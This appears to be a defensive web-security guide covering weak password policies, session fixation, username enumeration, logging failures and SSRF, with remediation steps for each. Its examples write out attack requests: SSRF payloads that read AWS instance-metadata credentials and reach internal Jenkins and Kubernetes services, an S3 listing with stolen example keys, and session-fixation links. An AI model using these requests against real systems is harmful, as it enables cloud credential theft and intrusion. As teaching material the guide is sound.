Common Vulnerabilities:

- Weak Password Policies (Allowing Short, Predictable, or Reused Passwords)
- Missing or Improperly Enforced Multi-Factor Authentication (MFA)
- Brute-Force or Credential Stuffing Due to Lack of Rate Limiting
- Session Fixation or Session Hijacking Due to Poor Session Management
- Exposed or Hardcoded Credentials in Source Code or Configuration Files
- Improperly Implemented Password Reset or Recovery Mechanisms Allowing 
  Account Takeovers

To mitigate these risks, applications should enforce strong password policies, implement MFA for critical actions, use secure session management practices (e.g., regenerating session IDs after login), and protect stored credentials using strong hashing algorithms (bcrypt, Argon2, PBKDF2). Additionally, monitoring authentication logs for suspicious activity and implementing rate-limiting mechanisms can help prevent brute-force and automated attacks.

Weak Password Policy

Description

A Weak Password Policy occurs when an application allows users or system administrators to create passwords that are easy to guess, short, or lack complexity, increasing the risk of brute-force attacks, credential stuffing, and unauthorized access. Weak password policies often result in users choosing predictable passwords (e.g., "123456", "password", or "qwerty"), which attackers can crack in seconds using automated tools.

A weak password policy also includes practices such as allowing password reuse, not enforcing expiration policies, and failing to implement multi-factor authentication (MFA). Without proper controls, an attacker who obtains or guesses a single credential can compromise multiple user accounts and sensitive systems.

Examples

Allowing Simple or Common Passwords

An application that does not enforce password complexity may allow users to set weak passwords such as:

  • password
  • 12345678
  • qwerty123
  • admin

Attackers can easily guess or brute-force these passwords using automated tools like Hydra, John the Ripper, or hashcat.

No Multi-Factor Authentication (MFA)

If an application relies solely on password-based authentication without requiring an additional factor (e.g., OTP, biometric, or hardware key), an attacker who steals or cracks a password can fully take over an account.

Lack of Account Lockout or Rate Limiting

A system that does not limit login attempts allows attackers to brute-force a password indefinitely. For example:

POST /login
username=admin&password=admin123

Without a rate-limiting mechanism, an attacker can script thousands of attempts per second until they find a correct combination.

Allowing Password Reuse or No Expiration

If users can reuse old passwords, attackers can use previously leaked credentials in credential stuffing attacks. Without expiration policies, a password might remain unchanged for years, giving attackers more time to compromise accounts.

Remediation

  1. Enforce Strong Password Requirements

    • Require passwords to be at least 10-16 characters long.
    • Mandate a mix of uppercase, lowercase, numbers, and special characters.
    • Prevent the use of common passwords by checking against leaked password databases (e.g., Have I Been Pwned API).
  2. Implement Multi-Factor Authentication (MFA)

    • Enforce MFA for high-privilege accounts and sensitive actions.
    • Support TOTP (Time-Based One-Time Passwords), biometric authentication, or hardware security keys.
  3. Apply Rate Limiting and Account Lockouts

    • Lock accounts temporarily after 5-10 failed login attempts.
    • Implement progressive delays (e.g., increasing wait time after each failed attempt).
    • Use CAPTCHAs for login forms to block automated brute-force attempts.
  4. Enforce Password Expiration and Rotation

    • Require users to change passwords periodically (e.g., every 90 days for critical accounts).
    • Prevent the reuse of previous 5-10 passwords to stop credential cycling.
  5. Use Secure Password Hashing Algorithms

    • Store passwords securely using bcrypt, Argon2, or PBKDF2 with strong salting.
    • Avoid outdated or insecure hashing methods like MD5 or SHA-1.

Session Fixation

Description

Session Fixation is a vulnerability where an attacker forces a user to use a known session ID, allowing the attacker to hijack the session after the user logs in. This attack is possible when the application fails to issue a new session ID after authentication, enabling an attacker to set a session ID before login and then reuse it once the victim authenticates.

Additionally, if sessions remain valid after logout, attackers who obtain a valid session ID can continue accessing a user's account even after the user logs out. This happens when the application fails to invalidate sessions properly on logout, leaving them active for further use.

By exploiting session fixation, attackers can impersonate legitimate users, gaining unauthorized access to sensitive actions or personal data.

Examples

Setting a Fixed Session ID Before Login

  1. Attacker generates a session ID:

    GET /login
    Set-Cookie: JSESSIONID=123456
    
  2. Attacker tricks the victim into using this session ID

    • By embedding the session ID in a phishing link:

      https://example.com/login;JSESSIONID=123456
      
    • By injecting a session ID in a cookie via Cross-Site Scripting (XSS).

  3. Victim logs in using the attacker's session ID

    • The session remains unchanged after login.
  4. Attacker now has access to the victim's authenticated session

    • Since the session ID remains the same before and after login, the attacker can use JSESSIONID=123456 to access the victim's account.

Session Remains Valid After Logout

Some applications fail to properly invalidate session tokens when a user logs out. In such cases:

  1. User logs in and gets a session token:

    Set-Cookie: sessionid=abcd1234; HttpOnly; Secure
    
  2. Attacker steals the session ID (e.g., via XSS, session fixation, or network sniffing).

  3. User logs out, expecting the session to be invalidated.

  4. Attacker reuses the same session token after logout:

    GET /dashboard
    Cookie: sessionid=abcd1234
    
    • If the server does not invalidate the session properly, the attacker still has access.

Remediation

  1. Regenerate Session ID After Login

    • Immediately issue a new session ID upon authentication to prevent session fixation.

    • In PHP:

      session_regenerate_id(true);
      
    • In Java (Spring Security):

      http.sessionManagement().sessionFixation().newSession();
      
  2. Invalidate Session Properly on Logout

    • Ensure the session is fully destroyed on logout:

      session_destroy();
      
    • Remove session cookies in HTTP headers:

      Set-Cookie: sessionid=deleted; expires=Thu, 01 Jan 1970 00:00:00 GMT; Secure; HttpOnly
      
  3. Set Secure Cookie Attributes

    • Use HttpOnly, Secure, and SameSite attributes to protect session cookies:

      Set-Cookie: JSESSIONID=abcd1234; HttpOnly; Secure; SameSite=Strict
      
  4. Implement Session Timeout and Expiry

    • Automatically expire inactive sessions to prevent hijacking.
    • Enforce session expiration after a fixed time (e.g., 30 minutes of inactivity).
  5. Restrict Session Sharing Across Devices

    • Implement device fingerprinting or IP binding to limit session use to the originating device.

Username Enumeration

Description

Username Enumeration occurs when an attacker can determine whether a specific username exists within an application by analyzing different system responses. This vulnerability allows attackers to compile lists of valid usernames, making brute-force attacks, credential stuffing, and social engineering attacks more effective.

Applications commonly expose username enumeration vulnerabilities through login forms, password reset pages, registration checks, and API responses. If an application provides different error messages or response times based on whether a username exists, an attacker can use this information to confirm valid user accounts before launching targeted attacks.

Examples

Login Form with Distinct Responses

A vulnerable login form may return different messages depending on whether the username exists:

Valid Username, Wrong Password

POST /login
username=admin&password=wrongpassword

Response:

"Invalid password."

(Indicates that "admin" exists)

Non-Existent Username

POST /login
username=notrealuser&password=wrongpassword

Response:

"User does not exist."

(Confirms that "notrealuser" is not a registered account)

Attackers can exploit this behavior to compile a list of valid usernames.

Password Reset Function with Different Messages

If the password reset feature leaks username information, an attacker can probe email addresses or usernames:

POST /reset-password
[email protected]

Responses:

  • "Password reset link sent to your email" → (Valid email confirmed)
  • "No account found with this email" → (Invalid email revealed)

Timing Attacks on API Authentication

Even if error messages are generic, differences in server response time can indicate whether a username is valid. For example:

  • Valid username: Response time 250ms
  • Invalid username: Response time 50ms

Attackers can measure these delays and infer which usernames exist.

Remediation

  1. Use Generic Error Messages

    • Ensure that authentication and password reset responses do not distinguish between valid and invalid usernames.
    • Use a generic message for all cases:
      • "Invalid login credentials."
      • "If the account exists, you will receive a password reset email."
  2. Normalize Response Times

    • Prevent timing attacks by ensuring that authentication and account-related requests take a constant response time, regardless of whether the username exists.
  3. Implement Rate Limiting and Monitoring

    • Restrict login and reset attempts per IP address or session (e.g., 5 attempts per minute).
    • Use Web Application Firewalls (WAF) to detect and block automated enumeration attempts.
  4. Require CAPTCHA on Sensitive Endpoints

    • Implement CAPTCHAs on login, registration, and password reset pages to mitigate automated username enumeration.

Software and Data Integrity Failures

Software and Data Integrity Failures occur when applications do not properly verify the integrity of software updates, critical data, or dependencies, allowing attackers to inject malicious code, tamper with sensitive data, or exploit untrusted sources. This can lead to remote code execution (RCE), data corruption, supply chain attacks, and unauthorized modifications to application behavior.

Common Vulnerabilities:

- Lack of Digital Signatures or Hash Validation for Software Updates
- Use of Untrusted or Compromised Third-Party Libraries, Plugins, or Packages
- Tampering with Configuration Files, Logs, or Critical System Data
- Unsecured Continuous Integration/Continuous Deployment (CI/CD) Pipelines
- Malicious Dependency Injection (Supply Chain Attacks)
- Failure to Enforce Integrity Controls for Data Stored in Databases or Caches

To mitigate these risks, applications should use cryptographic signatures to verify software integrity, restrict third-party dependencies to trusted sources, implement secure CI/CD pipelines, and protect critical data from unauthorized modifications using hashing, access controls, and tamper-detection mechanisms. Regular audits and dependency monitoring can further reduce the risk of software and data integrity failures.

Data Tampering

Security Logging and Monitoring Failures

Security Logging and Monitoring Failures occur when an application does not adequately record, analyze, or respond to security-relevant events, allowing attackers to operate undetected. Without proper logging and monitoring, organizations may fail to detect breaches, track suspicious activity, or respond to incidents in a timely manner, leading to data theft, system compromise, or prolonged attacker persistence.

Common Vulnerabilities:

- Lack of Logging for Critical Events (e.g., Logins, Failed Authentication Attempts,
  Privilege Escalations)
- Failure to Detect or Alert on Repeated Brute-Force or Unauthorized Access Attempts
- Logs That Lack Sufficient Detail (e.g., Missing Timestamps, User IDs, IP Addresses)
- Storing Logs in Insecure Locations, Allowing Attackers to Modify or Delete Evidence
- No Real-Time Monitoring or Automated Alerting on Security Events
- Overwhelming False Positives or Alert Fatigue, Causing Legitimate Threats to Be
  Ignored

To mitigate these risks, organizations should enable logging for authentication and critical system events, securely store and protect logs from tampering, implement real-time monitoring with alerting mechanisms, and regularly review logs to detect anomalies. Using Security Information and Event Management (SIEM) solutions and setting up proactive incident response workflows can significantly improve security visibility and threat detection.

Insufficient Logging and Monitoring

Description

Insufficient Logging and Monitoring occurs when an application fails to adequately record, store, or analyze security-related events, making it difficult to detect and respond to intrusions, fraud, data breaches, or malicious activity. Without proper logging, attackers can operate undetected for long periods, potentially compromising sensitive data or escalating privileges without being noticed.

Inadequate monitoring may also result in delayed or missing alerts for brute-force attacks, privilege escalations, unauthorized access, or API abuses. Even when logs are recorded, if they are not protected from tampering, stored securely, and regularly reviewed, they lose their value in forensic investigations and incident response.

Examples

Lack of Login and Authentication Event Logging

An application that does not log successful and failed login attempts allows attackers to perform brute-force attacks or credential stuffing without detection.

POST /login
username=admin&password=wrongpassword

No log entry is created, making it impossible to detect repeated failed login attempts.

No Logging of Privileged Actions

If an application does not log privileged user actions, an attacker or insider threat may modify account roles, change configurations, or delete data without being detected.

Example: An admin creates a new user with superuser privileges, but the event is not logged.

Failure to Monitor API and Sensitive Requests

APIs that handle financial transactions, password changes, or authentication tokens should log relevant activity. Without this, an attacker can transfer funds, change credentials, or manipulate requests without detection.

POST /update-balance
{ "user": "attacker", "balance": "9999999" }

If the API does not log this request, fraud detection systems cannot flag it.

Logs Are Stored But Not Monitored

Even if logs are generated, failing to actively monitor them allows real-time attacks to go unnoticed. Without automated alerts, security teams must manually sift through logs—often too late.

Remediation

  1. Implement Comprehensive Logging

    • Log all authentication events (successful logins, failed attempts, password resets).
    • Capture privileged actions (admin access, permission changes, financial transactions).
    • Include API activity logs for sensitive operations.
  2. Use Secure and Tamper-Proof Log Storage

    • Store logs in append-only formats or write-once storage (WORM) to prevent attackers from deleting traces of their activity.
    • Use log integrity mechanisms such as cryptographic signing or HMAC to prevent log tampering.
  3. Enable Real-Time Monitoring and Alerts

    • Integrate logs with Security Information and Event Management (SIEM) solutions like Splunk, ELK Stack, or Wazuh.
    • Set up alerts for suspicious activity (e.g., repeated failed logins, privilege escalations, unusual API requests).
  4. Mask or Encrypt Sensitive Data in Logs

    • Avoid logging plaintext credentials, API keys, or personal data.

    • Example of secure logging:

      [INFO] User login attempt: user=admin, IP=192.168.1.10, status=FAILED
      
    • Example of insecure logging:

      [DEBUG] User login: username=admin, password=admin123
      
  5. Regularly Review and Audit Logs

    • Conduct periodic log analysis to detect anomalies.
    • Use machine learning or behavioral analytics to spot patterns of compromise.
  6. Ensure Log Retention Policies

    • Retain logs for 6-12 months to support forensic investigations.
    • Apply log rotation and archiving to maintain storage efficiency.

Server-Side Request Forgery (SSRF)

Server-Side Request Forgery (SSRF) occurs when an attacker tricks a vulnerable server into making unauthorized requests to internal or external resources. This can lead to data exfiltration, internal network scanning, cloud metadata exposure, and service exploitation. SSRF is particularly dangerous when applications allow user-controlled URLs or fail to restrict outgoing requests.

Common Vulnerabilities:

- Fetching External URLs Without Proper Validation (e.g., allowing arbitrary URLs in
  request parameters)
- Accessing Internal Services (e.g., databases, admin panels, cloud metadata APIs)
- SSRF-Based AWS Credentials Theft via the Instance Metadata Service (IMDS)
- Bypassing Network Restrictions to Exploit Internal Systems
- Interacting with Cloud Services (e.g., Kubernetes, Docker APIs) to Gain Unauthorized
  Access
- Forcing the Application to Perform Malicious Actions on Other Services

To mitigate these risks, applications should validate and restrict user-supplied URLs, enforce allowlists for outgoing requests, block access to internal IP ranges (e.g., 127.0.0.1, 169.254.169.254), and use metadata service version 2 (IMDSv2) in AWS environments. Additionally, logging and monitoring outbound requests can help detect and prevent SSRF exploitation attempts.

Server-Side Request Forgery (SSRF) – AWS Credentials Theft

Description

Server-Side Request Forgery (SSRF) occurs when an attacker manipulates a vulnerable server to make unauthorized HTTP requests to internal or external services. When SSRF is exploited in cloud environments like AWS, attackers can query internal metadata endpoints to steal sensitive credentials, such as IAM role access keys, allowing them to gain control over AWS resources.

AWS instances use the Instance Metadata Service (IMDS), which provides temporary security credentials to applications running inside EC2 instances. If an application vulnerable to SSRF can make internal HTTP requests, attackers can access this metadata and extract AWS credentials, leading to privilege escalation, data exfiltration, and full account compromise.

Examples

Exploiting SSRF to Access AWS Metadata

A vulnerable web application allows users to fetch remote URLs by supplying an arbitrary URL parameter:

GET /fetch?url=https://example.com

If the application does not properly validate user-supplied URLs, an attacker can redirect the request to AWS IMDS:

GET /fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/

Attack Steps

  1. The attacker sends a request to fetch data from AWS's metadata service (169.254.169.254).
  2. The response exposes available IAM roles assigned to the EC2 instance.
  3. The attacker then retrieves temporary AWS access keys:
GET http://169.254.169.254/latest/meta-data/iam/security-credentials/EC2Role
  1. The response returns credentials:
{
  "AccessKeyId": "AKIAEXAMPLE123",
  "SecretAccessKey": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
  "Token": "FQoGZXIvYXdzEXAMPLE...",
  "Expiration": "2025-03-31T12:00:00Z"
}
  1. The attacker now has valid AWS credentials and can:
  • List and steal S3 buckets:

    aws s3 ls --access-key AKIAEXAMPLE123 --secret-key wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY --token FQoGZXIvYXdzEXAMPLE...
    
  • Create or delete EC2 instances, modify IAM roles, or exfiltrate data.

Remediation

  1. Block Requests to AWS Metadata Service

    • Implement firewall rules or network policies to prevent access to 169.254.169.254 from the application.
    • In AWS, disable IMDS v1 (which is vulnerable to SSRF) and require IMDSv2, which enforces authentication:
    aws ec2 modify-instance-metadata-options --instance-id i-1234567890abcdef0 --http-endpoint enabled --http-tokens required
    
  2. Validate and Restrict Outbound Requests

    • Whitelist only trusted domains for user-supplied URLs.
    • Reject requests containing IP addresses, localhost, or internal services.
    • Example regex to filter external URLs:
    ^(https?:\/\/(www\.)?trusted-domain\.com\/.*)$
    
  3. Use IAM Role Restrictions

    • Assign least privilege IAM roles to EC2 instances to limit access to AWS resources.
    • Block sensitive actions (e.g., s3:ListBuckets, iam:PassRole) in IAM policies.
  4. Enforce Network Segmentation

    • Use VPC Security Groups and NACLs (Network ACLs) to restrict instance communication with internal services.
    • Ensure EC2 instances cannot make arbitrary requests to internal services.

Server-Side Request Forgery (SSRF) – Internal Network Access

Description

Server-Side Request Forgery (SSRF) occurs when an attacker manipulates a vulnerable server into making unauthorized HTTP requests to internal or external services. When SSRF is used to access internal networks, attackers can scan internal systems, query sensitive services, or exploit insecure internal applications that are not meant to be publicly accessible.

Many internal applications, databases, admin panels, and cloud metadata services are only accessible from within the network and are not exposed to the internet. However, if an application is vulnerable to SSRF, an attacker can use it as a proxy to bypass firewall restrictions, gaining access to internal assets, cloud services, and critical infrastructure.

Examples

Scanning Internal Network Services

A vulnerable application allows users to fetch external URLs, but it does not validate input properly:

GET /fetch?url=https://example.com

An attacker can scan the internal network by changing the URL parameter to query local IP ranges:

GET /fetch?url=http://192.168.1.1

If the server responds with 200 OK, the attacker confirms that an internal service is running on 192.168.1.1.

Accessing Internal Applications

Some enterprises host internal admin panels, monitoring dashboards, or databases at private IP addresses (e.g., 10.0.0.1, 192.168.1.1). If an SSRF vulnerability exists, an attacker can access these services.

Example: Accessing an Internal Jenkins Server

GET /fetch?url=http://10.0.0.5:8080
  • If Jenkins is running internally, the attacker may reach the admin login panel.
  • If no authentication is required, the attacker may run commands on the internal CI/CD pipeline.

Querying Cloud Services (Kubernetes, Docker APIs)

In cloud environments, SSRF can be used to query internal APIs, such as:

  • Kubernetes API Server (https://10.0.0.1:6443)
  • Docker Remote API (http://localhost:2375)
  • AWS Metadata Service (http://169.254.169.254/latest/meta-data/)

Example: Listing Kubernetes Pods

GET /fetch?url=https://10.0.0.1:6443/api/v1/namespaces/default/pods

If the Kubernetes API is misconfigured, the attacker might retrieve internal pod names and container metadata.

Bypassing Network Access Controls

Some web applications restrict admin panels or internal APIs based on IP address (e.g., only accessible from 127.0.0.1).

If SSRF is present, an attacker can force the vulnerable server to make a local request on their behalf, bypassing these restrictions:

GET /fetch?url=http://127.0.0.1/admin

If the application is misconfigured, the attacker can now access internal admin functionality remotely.

Remediation

  1. Block Requests to Internal IP Ranges

    • Restrict access to internal networks (127.0.0.1, 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16).

    • Example rule to deny requests:

      if request.url contains "127.0.0.1" or "169.254.169.254" or matches "10\..*" {
           block request;
      }
      
  2. Validate and Restrict Outbound Requests

    • Whitelist only trusted domains instead of allowing open URL input.

    • Reject requests containing IP addresses, localhost, or internal services.

    • Example regex filter:

      ^(https?:\/\/(www\.)?trusted-domain\.com\/.*)$
      
  3. Use a Proxy for Outbound Requests

    • Route all requests through a secure outbound proxy that enforces domain whitelisting.
    • Block direct requests to internal network resources.
  4. Enforce Network Segmentation

    • Prevent web servers from directly accessing internal applications or cloud metadata services.
    • Use VPC security groups and firewall rules to restrict server-to-server communication.
  5. Disable Unnecessary Internal Services

    • Close exposed internal services (e.g., Jenkins, Redis, Elasticsearch) that do not need to be accessible internally.
    • Require authentication and IP whitelisting for internal web applications.